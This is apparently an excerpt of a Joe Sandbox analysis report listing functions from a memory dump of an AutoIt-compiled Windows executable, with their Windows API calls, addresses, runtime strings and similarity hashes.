                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                            • Opcode ID: 726348926049929dc057c8a2e78eb8b67b2bc72e82a11085255e46966413b939
                                                                                                                                            • Instruction ID: f20928e41ff78faced4295c91b761e5f6a8a7a26747bf2a59f65598acce2f9dc
                                                                                                                                            • Opcode Fuzzy Hash: 726348926049929dc057c8a2e78eb8b67b2bc72e82a11085255e46966413b939
                                                                                                                                            • Instruction Fuzzy Hash: 02416265C21258B5DB11FBBA8C8AACFB7B8EF05310F518876E518E3121FA34D255C3B6
                                                                                                                                            APIs
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00E537B7
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E537BF
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E537CA
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00E537D6
                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E53812
                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E53823
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E56504,?,?,000000FF,00000000,?,000000FF,?), ref: 00E5385E
                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E5387D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                            • Opcode ID: aecba71acb613fd7b3f8bb7d1f30125d88ec88adfe8ccb871f9c20d7a6c86528
                                                                                                                                            • Instruction ID: 6bc47cde88c73b155a5ce157cece794c2586985efff7a411b8ef9301ef821304
                                                                                                                                            • Opcode Fuzzy Hash: aecba71acb613fd7b3f8bb7d1f30125d88ec88adfe8ccb871f9c20d7a6c86528
                                                                                                                                            • Instruction Fuzzy Hash: C631C072205214BFEB294F61CC89FEB3BADEF09756F040465FE08EA191C6B59C45C7A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                            • Opcode ID: 9ca3e1d42fe1b4bb01687f10fcf8ac14e4cd6752b224264793380b3e7bbe5b91
                                                                                                                                            • Instruction ID: 32d6f95b4d7fc3d8c502c45f380a63f5457bc2c47001bf9727d247f6919e9add
                                                                                                                                            • Opcode Fuzzy Hash: 9ca3e1d42fe1b4bb01687f10fcf8ac14e4cd6752b224264793380b3e7bbe5b91
                                                                                                                                            • Instruction Fuzzy Hash: 0AD1D372A0070A9FDF10CF68E885AAEB7B5FF48308F149469E915BB282D770ED45CB50
                                                                                                                                            APIs
                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E0194E
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E019D1
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E01B7B,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01A64
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01A7B
                                                                                                                                              • Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01AF7
                                                                                                                                            • __freea.LIBCMT ref: 00E01B22
                                                                                                                                            • __freea.LIBCMT ref: 00E01B2E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                            • Opcode ID: 2fd4bf24a156c14fecf3b5b7634cff8498f16dc1fd91f5322da1f3e9165fc2e7
                                                                                                                                            • Instruction ID: 981f73993dcd28e9446dce9d822a66071a8aa5b9774ba41a7633cfec965cea83
                                                                                                                                            • Opcode Fuzzy Hash: 2fd4bf24a156c14fecf3b5b7634cff8498f16dc1fd91f5322da1f3e9165fc2e7
                                                                                                                                            • Instruction Fuzzy Hash: 3391C272E00216ABDB248EA4C891AEE7BB5EF59314F585599E905FB1C0E734CDC4CB60
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                            • Opcode ID: a087cae650eda2626f8f4c4051b25b331b8cecdfb1a4a6f213e772230f7fc673
                                                                                                                                            • Instruction ID: 591f3ce5def0cdb21fa6a27322ae5b5ce998d1d2b1e694b0c58e3cb4970177bb
                                                                                                                                            • Opcode Fuzzy Hash: a087cae650eda2626f8f4c4051b25b331b8cecdfb1a4a6f213e772230f7fc673
                                                                                                                                            • Instruction Fuzzy Hash: 9D91AE72A00615ABCF24CFA5EC48FAEBBB8EF45714F10955AF505BB281D7709941CBA0
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E31C1B
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31C43
                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E31C67
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31C97
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31D1E
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31D83
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31DEF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                            • Opcode ID: 785c36996f7f70c52bf00c4cb8ec548bf1f424503130f0838e39346bb0dabd91
                                                                                                                                            • Instruction ID: df4f6a7b61f75b3fc9d1335af8878b25919e9b28f870752b8296e6e1743f8f4c
                                                                                                                                            • Opcode Fuzzy Hash: 785c36996f7f70c52bf00c4cb8ec548bf1f424503130f0838e39346bb0dabd91
                                                                                                                                            • Instruction Fuzzy Hash: 39911171A002199FDB049F99C888BFEBBB4FF05316F1460ADE950FB291D774A940CB60
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E443C8
                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00E444D7
                                                                                                                                            • _wcslen.LIBCMT ref: 00E444E7
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E4467C
                                                                                                                                              • Part of subcall function 00E3169E: VariantInit.OLEAUT32(00000000), ref: 00E316DE
                                                                                                                                              • Part of subcall function 00E3169E: VariantCopy.OLEAUT32(?,?), ref: 00E316E7
                                                                                                                                              • Part of subcall function 00E3169E: VariantClear.OLEAUT32(?), ref: 00E316F3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                            • Opcode ID: 3c688ee167a6cc2ac0181790947c2f213cac61c86217f394fe102220c65cdca1
                                                                                                                                            • Instruction ID: 16be511d2f7089bc254a9c89843c6fcca6d453a197684b4ecb65ae82e1d08018
                                                                                                                                            • Opcode Fuzzy Hash: 3c688ee167a6cc2ac0181790947c2f213cac61c86217f394fe102220c65cdca1
                                                                                                                                            • Instruction Fuzzy Hash: 62918EB46083019FCB14EF24D481A6AB7E4FF89314F14891DF88AA7391DB31ED46CB62
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E208FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?,?,00E20C4E), ref: 00E2091B
                                                                                                                                              • Part of subcall function 00E208FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20936
                                                                                                                                              • Part of subcall function 00E208FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20944
                                                                                                                                              • Part of subcall function 00E208FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?), ref: 00E20954
                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E456AE
                                                                                                                                            • _wcslen.LIBCMT ref: 00E457B6
                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E4582C
                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00E45837
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                            • Opcode ID: aa0b22eef4a25f61b767fac7f234b8f785f287abdedbd9abea41e550e5e9b299
                                                                                                                                            • Instruction ID: 496d3c7af2d29ebb2d9df81d0aaa6a7bf7d9918048fc500ac9f83b2ddd011351
                                                                                                                                            • Opcode Fuzzy Hash: aa0b22eef4a25f61b767fac7f234b8f785f287abdedbd9abea41e550e5e9b299
                                                                                                                                            • Instruction Fuzzy Hash: 2F91D272D00219ABDF14DFA4DC81EEEBBB9EF08314F10456AE915B7251EB709A45CFA0
                                                                                                                                            APIs
                                                                                                                                            • GetMenu.USER32(?), ref: 00E52C1F
                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00E52C51
                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E52C79
                                                                                                                                            • _wcslen.LIBCMT ref: 00E52CAF
                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00E52CE9
                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00E52CF7
                                                                                                                                              • Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
                                                                                                                                              • Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
                                                                                                                                              • Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB
                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E52D7F
                                                                                                                                              • Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                            • Opcode ID: 26a10b9edf64d49e397ef7d7318d2201e60f810beaccfafee577fc1fb24aaf95
                                                                                                                                            • Instruction ID: a324083c684f5ee661e2f4c91a50014313553227b57dd883278f45b7fa45edd2
                                                                                                                                            • Opcode Fuzzy Hash: 26a10b9edf64d49e397ef7d7318d2201e60f810beaccfafee577fc1fb24aaf95
                                                                                                                                            • Instruction Fuzzy Hash: 3571AC75A00205AFCB14EF65C881AAEBBF1EF49311F10885CE916FB351DB74AE45CBA0
                                                                                                                                            APIs
                                                                                                                                            • GetParent.USER32(?), ref: 00E2B8C0
                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00E2B8D5
                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00E2B936
                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E2B964
                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E2B983
                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E2B9C4
                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E2B9E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                            • Opcode ID: 1e74664533c8df9aacd810126d0cccfb75cce81ace7536ff606a8deaa34e350f
                                                                                                                                            • Instruction ID: 177e12c56c59ef691450aa8e0dc09494219b36b04d73e65bb57438acf9d613fd
                                                                                                                                            • Opcode Fuzzy Hash: 1e74664533c8df9aacd810126d0cccfb75cce81ace7536ff606a8deaa34e350f
                                                                                                                                            • Instruction Fuzzy Hash: D651E2A09087E53EFB3642389C45BBA7FE95B46308F089889E1D9A58D2C3D8ACC4D751
                                                                                                                                            APIs
                                                                                                                                            • GetParent.USER32(00000000), ref: 00E2B6E0
                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00E2B6F5
                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00E2B756
                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E2B782
                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E2B79F
                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E2B7DE
                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E2B7FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                            • Opcode ID: 1c7ddeb3d7684ad1612b5494ebb58971934a402f5b6ab8c0e12c779d4dcbf52e
                                                                                                                                            • Instruction ID: 49d1811f6f33d708f47462f62743b87aa29b8d205afb8ae00888bf02a0df8604
                                                                                                                                            • Opcode Fuzzy Hash: 1c7ddeb3d7684ad1612b5494ebb58971934a402f5b6ab8c0e12c779d4dcbf52e
                                                                                                                                            • Instruction Fuzzy Hash: DA5126A09087E53EFB3A8334DC55B767FA85B45308F0C958AE1D86A8C2D3D4EC88E750
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DF5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DF57E3
                                                                                                                                            • __fassign.LIBCMT ref: 00DF585E
                                                                                                                                            • __fassign.LIBCMT ref: 00DF5879
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DF589F
                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00DF5F16,00000000,?,?,?,?,?,?,?,?,?,00DF5F16,?), ref: 00DF58BE
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00DF5F16,00000000,?,?,?,?,?,?,?,?,?,00DF5F16,?), ref: 00DF58F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                            • Opcode ID: 50cb756315ab7744794ba8343aeba9ed382d2f97f773e1e24bdea5fdfdb414ca
                                                                                                                                            • Instruction ID: f6815594f57f37b0fdfb29bc61ac49ed2f30e0e34f725176b831066d1cefc1d9
                                                                                                                                            • Opcode Fuzzy Hash: 50cb756315ab7744794ba8343aeba9ed382d2f97f773e1e24bdea5fdfdb414ca
                                                                                                                                            • Instruction Fuzzy Hash: 7B51BF70A04649DFCB14CFA8EC81AEEBBF8EF09310F15855AEA55E7291D7709A41CF60
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00DE30BB
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00DE30C3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00DE3151
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE317C
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00DE31D1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                            • Opcode ID: cc5edd4d4ec091789ae785a0c4a365954e9f57f1721ecba80e1c6a8e71b58dbb
                                                                                                                                            • Instruction ID: e2633a8ebc4f466170d3cd62c0217e30d13ca9928e89cea65128730eb0390d6e
                                                                                                                                            • Opcode Fuzzy Hash: cc5edd4d4ec091789ae785a0c4a365954e9f57f1721ecba80e1c6a8e71b58dbb
                                                                                                                                            • Instruction Fuzzy Hash: C141A934A00348ABCF10EF5AC849ABE7BB5EF45354F188199E8196B392D731DB15CBB1
                                                                                                                                            APIs
